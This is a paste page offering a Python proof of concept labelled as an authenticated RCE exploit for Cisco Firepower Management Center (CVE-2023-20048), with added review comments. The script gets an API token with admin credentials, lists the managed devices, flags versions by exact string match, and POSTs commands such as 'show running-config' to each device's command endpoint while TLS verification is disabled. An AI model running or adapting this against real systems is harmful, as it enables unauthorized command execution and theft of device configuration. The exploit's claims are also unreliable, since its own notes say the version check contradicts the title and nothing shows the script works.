FlyFar

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE - CVE-2023-20048

Mar 13th, 2024
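# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18, 6.4.0.16, 6.6.7.1]
# CVE : [CVE-2023-20048]
"""Paste labelled as a proof of concept for CVE-2023-20048 (Cisco FMC).

What the code below does, in order:

1. Requests an API token from the FMC with a username and password
   (HTTP basic auth).
2. Lists the device records of one domain.
3. Fetches each device record and, when its type is "FTD" and its software
   version string equals one of three listed values, POSTs three ``show``
   commands to a per-device command URL and prints each result.

Review notes:

* Every request is made with a valid FMC account; the code shows no step
  that works without credentials.
* Certificate verification is switched off for the whole session, including
  the request that carries the password.
* The "vulnerable" verdict is an exact string match against three versions.
  The page title says "< 6.6.7.1", which this match does not implement (the
  list even contains 6.6.7.1 itself), so the printed verdict is not a
  substitute for checking the vendor advisory's fixed releases.
* NOTE(review): nothing on the page shows the script was run against a real
  FMC; the request paths and header names are reproduced as given.
* For log review: the request pattern produced here is one token request,
  one device listing, one GET per device, then POSTs whose path contains
  "/operational/command/".
"""

import requests
import json

# Connection settings for the FMC web services interface.
# NOTE(review): the credentials are hard-coded; a filled-in copy of this file
# is itself a secret.
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"

# Upper bound in seconds for each HTTP request, so an unreachable host fails
# instead of blocking forever (requests has no default timeout).
REQUEST_TIMEOUT = 30

# One session so the token header set below is reused on every later request.
session = requests.Session()
# NOTE(review): this disables TLS certificate verification for all requests on
# the session. The admin password and the API token are then sent to whichever
# host answers, so an on-path host can read them. Point `verify` at the
# appliance's CA bundle instead when one is available.
session.verify = False

# Ask for an access token and a refresh token.
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
try:
    response = session.post(
        token_url, auth=(fmc_user, fmc_pass), timeout=REQUEST_TIMEOUT
    )
except requests.RequestException as e:
    # Connection, TLS and timeout errors are raised by the call itself, so the
    # call has to sit inside the try block to be reported cleanly.
    raise SystemExit(str(e))

if response.status_code != 200:
    # SystemExit with a message prints it to stderr and exits non-zero.
    raise SystemExit(
        "Failed to get tokens, status code: " + str(response.status_code)
    )

try:
    access_token = response.headers["X-auth-access-token"]
    # Read but not used anywhere below.
    refresh_token = response.headers["X-auth-refresh-token"]
except KeyError as e:
    raise SystemExit("Token header missing from response: " + str(e))

# The script sends the token in the Authorization header on later requests.
session.headers["Authorization"] = access_token

# Domain whose devices are listed; change this to your domain id.
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# List the devices managed by the FMC in that domain.
devices_url = (
    fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
)
try:
    response = session.get(devices_url, timeout=REQUEST_TIMEOUT)
except requests.RequestException as e:
    raise SystemExit(str(e))

if response.status_code != 200:
    raise SystemExit(
        "Failed to get devices, status code: " + str(response.status_code)
    )

try:
    device_list = response.json()
except ValueError as e:
    raise SystemExit(str(e))

# (name, self link) per device; a listing without "items" yields no devices
# instead of a KeyError.
devices = [
    (item["name"], item["links"]["self"])
    for item in device_list.get("items", [])
]

# Versions the script treats as vulnerable (exact match only, see docstring).
vulnerable_versions = ["6.2.3.18", "6.4.0.16", "6.6.7.1"]

# Commands sent to each matching device.
# NOTE(review): the output of "show running-config" is sensitive configuration
# data and is printed to stdout unredacted.
commands = ["show version", "show running-config", "show interfaces"]

for device_name, device_url in devices:
    # NOTE(review): device_url comes from the server's response and is
    # requested as-is with the session's token header attached.
    try:
        response = session.get(device_url, timeout=REQUEST_TIMEOUT)
        if response.status_code != 200:
            print(
                "Failed to get device details, status code: "
                + str(response.status_code)
            )
            continue
        details = response.json()
    except (requests.RequestException, ValueError) as e:
        print(e)
        continue

    # A record missing any of these keys raises KeyError and stops the script,
    # as in the original listing.
    device_type = details["type"]
    device_version = details["metadata"]["softwareVersion"]
    # Read but not used anywhere below.
    config_url = details["metadata"]["configURL"]

    if not (device_type == "FTD" and device_version in vulnerable_versions):
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
        continue

    print("Device " + device_name + " is vulnerable to CVE-2023-20048")

    # The device id is the last path segment of the device's self link.
    device_id = device_url.split("/")[-1]

    for command in commands:
        command_url = (
            fmc_url
            + "/api/fmc_config/v1/domain/"
            + domain_id
            + "/devices/devicerecords/"
            + device_id
            + "/operational/command/"
            + command
        )
        try:
            response = session.post(command_url, timeout=REQUEST_TIMEOUT)
            if response.status_code != 200:
                print(
                    "Failed to execute command, status code: "
                    + str(response.status_code)
                )
                continue
            payload = response.json()
        except (requests.RequestException, ValueError) as e:
            print(e)
            continue

        # str() so a non-string result is printed instead of raising TypeError.
        result = payload["result"]
        print("Command: " + command)
        print("Result: " + str(result))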